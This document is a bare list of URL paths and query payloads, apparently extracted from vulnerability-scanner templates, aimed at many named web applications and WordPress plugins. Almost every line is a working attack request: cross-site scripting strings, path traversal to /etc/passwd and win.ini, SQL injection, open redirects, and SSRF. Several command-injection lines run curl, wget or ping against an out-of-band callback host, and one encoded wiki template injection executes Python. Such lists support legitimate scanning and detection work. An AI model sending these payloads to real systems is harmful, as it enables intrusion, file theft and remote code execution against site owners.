/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,
/fp-content/
/flatpress/fp-content/
/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>
/queues
/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
/admin/suppliers/view_details.php?id=1
/api/v1/clusters/kubeconfig/k8s
/?url=<img/src=
/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0
/{{route}}
/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/mbilling/lib/icepay/icepay.php?democ={{randstr}};sleep%207;#
/wp-content/plugins/mstore-api/readme.txt
/main/webservices/additional_webservices.php
/?q=./gibbon.sql
/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}
/mifs/aad/api/v2/admins/users
/mifs/asfV3/api/v2/admins/users
/v1/folder?path=%2F
/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/
/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username
/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username
/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png
/AHT/AHT_UI/public/js/app.min.js
/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d
/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d
/WebInterface
/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}
/WebInterface/{{dirname}}/{{filename}}

/xmlrpc.php
/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}
/wp-content/plugins/media-library-assistant/readme.txt
/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg
/connectioncheck.php?ip={{url_encode(
/wp-content/plugins/form-maker/readme.txt
/log_proxy?url=http://{{interactsh-url}}
/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23
/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23
/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B
/?filename=../../../../../../etc/passwd&mphb_action=download
/wp-content/plugins/backup-backup/readme.txt
/wp-content/plugins/backup-backup/includes/backup-heart.php
/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={
/wp-content/plugins/essential-blocks/readme.txt
/php/ping.php
/wp-content/plugins/better-search-replace/README.txt
/wp-content/plugins/better-search-replace/readme.txt
/images//////////////////../../../../../../../../etc/passwd
/RP?wsrp-url=file:///etc/passwd
/RP?wsrp-url=file:///c:\\windows\\win.ini
/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>
/%255c%255c{{interactsh-url}}%255cC$%255cbb
/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime
/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
/v1/avatars/favicon?url=http://{{interactsh-url}}
/_admin/imgdownload.php?filename=imgdownload.php
/tshirtecommerce/ajax.php?type=svg
/tshirtecommerce/fonts.php?name=2&type=./../index.php
/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php
/api/dns
/wp-json/igd/v1/get-users-data
/assets/built%2F..%2F..%2F/package.json
/assets/built%2F..%2F..%2F%E0%A4%A/package.json
/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd
/public/ticket/ajax/ajax.php?action=getContacts&email=%
/static/..%5c..%5c..%5c..%5cetc/passwd
/download/{{repeat(
/api/v1/slack/image/slack-image{{repeat(
/cgi-bin/exportCfgwithpasswd
/excel.php
/pos-kasir-php/excel.php
/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view
/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki
/.cpr/%2Fetc%2Fpasswd
/modules/
/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/DownloadWindow.php?filename=../../../../../../../../etc/passwd
/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash
/../../../../etc/passwd
/modules/simpleimportproduct/send.php?phpinfo=1
/modules/updateproducts/send.php?phpinfo=1
/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=
/api/sys/set_passwd
/opencms/cmisatom/cmis-online/query
/cmisatom/cmis-online/query
/lang/log/httpd.log
/api/2.0/preview/mlflow/experiments/list
/api/Image/withpath/C:\Windows\win.ini
/api/sys/login
/uploads/
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css
/cgi-bin/MANGA/index.cgi
/wp-content/ldap-authentication-report.csv
/static/js/../../../../../../../../../../../../../../etc/passwd
/nodes?view=summary
/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000
/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd
/wp-content/plugins/wp-fastest-cache/readme.txt
/wp-content/backups-dup-lite/tmp/
/wp-content/backups-dup-pro/tmp/
/wp-content/uploads/prime-mover-export-files/1/
/wp-content/uploads/
/blog/wp-content/uploads/
/wordpress/wp-content/uploads/
/wp/wp-content/uploads/
/wp-content/uploads/{{backupfolder}}/
/index.php?showmessage=4&customermail=\
/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E
/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E
/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me
/functions/scripts/find_full_subnets.php
/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>
/unsafe/plain/https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg
/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E#top
/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf
/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/api/index.php/v1/config/application?public=true
/api/v1/config/application?public=true
/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small
/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert(
/jsps/genrequest.jsp?routineName=
/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>
/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or
/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5(
/wa.exe?REPORT&z=4&
/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1
/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/
/cas/logout?url=https://oast.pro
/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me
/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me
/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1
/cpanelwebcall/<img%20src=x%20onerror=
/cpanelwebcall/<><img%20src=x%20onerror=
/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E
/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword
/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}
/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>
/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d
/wp-content/plugins/protect-wp-admin/readme.txt
/wp-login.php?action=lostpassword&error=invalidkey
/bin/login/XWiki/XWikiLogin?xredirect=//oast.me
/default.aspx?years=http://oast.pro
/robots.txt
/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh
/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
/templates/pages/debug_panel.php?id={{randstr}}
/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message={{randstr}}
/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)
/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)
/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)
/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)
/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)
/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)
/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)
/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)
/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)
/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)
/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/print.php?nm_member=<script>alert(document.location)</script>
/data/model/custom_model_path/recruit.filelist.txt
/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27
/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27
/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E
/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085
/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number=
/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model
/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model
/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity
/users/viewi1omd
/find-a-matchpksyk
/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E
/reset-password/?selector=test
/home/courses?query=
/webmail/?mid={{to_lower(rand_base(4))}}
/webmail/?color=
/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.hsp?passwordExpired=yes&username=\\
/index.hsp?passwordExpired=yes&domainName=\\
/index.hsp?m=
/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E
/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so
/%5coast.pro/%2f%2e%2e
/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0
/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id=
/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1
/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=
/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf
/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>
/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/common/down/file?filekey=/../../../../../../../../../etc/passwd
/classified/%22%3E%3Cimg%20src=a%20onerror=alert(
/search/index?q=
/stores
/user_info
/faqs
/classifieds
/opencms/cmisatom/cmis-online/type?id=1%27
/api/v1/terminal/sessions/
/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest
/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1
/Help.aspx?helpkey=xxxxxxx
/{{string}}
//{{string}}
/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm
//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm
/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm
//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm
/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest
/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;
/search?filtered=1&q=test&filter[price]=100-1331
/search?filter[brandid]=vnxjb
/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest
/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E
/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>
/academy/tutor/filter?searched_word=acoa5\
/solr/admin/metrics
/?gf_page=randomstring
/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27
/project/switch/1?targetPath=http://oast.pro
/{{route}}search=@
/Citrix/teststoreAuth/SamlTest
/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt
/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
{{paths}}
/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh
/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme
/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me
/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+
/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+
/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=
/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=
/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e
/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e
/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*
/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*
